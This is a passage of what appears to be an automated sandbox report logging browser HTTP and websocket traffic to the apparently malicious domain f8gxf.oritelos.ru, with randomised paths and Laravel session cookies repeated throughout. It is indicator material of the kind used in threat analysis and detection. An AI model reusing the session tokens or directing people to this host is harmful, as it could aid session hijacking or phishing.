XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /hxfrw2DYZZsbHnkjqki9TmQkIfk5jufh48quUrIdw3ZYHOkO6r3Yenb HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: f8gxf.oritelos.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://f8gxf.oritelos.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3DSec-WebSocket-Key: +bTMGAdoN87sqqzFohmPGg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: f8gxf.oritelos.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://f8gxf.oritelos.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3DSec-WebSocket-Key: M620d7qGMuvu3N/tsCU05g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: f8gxf.oritelos.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://f8gxf.oritelos.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3DSec-WebSocket-Key: +tobkqSfi+bGncWgJSlwRw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: f8gxf.oritelos.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://f8gxf.oritelos.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3DSec-WebSocket-Key: 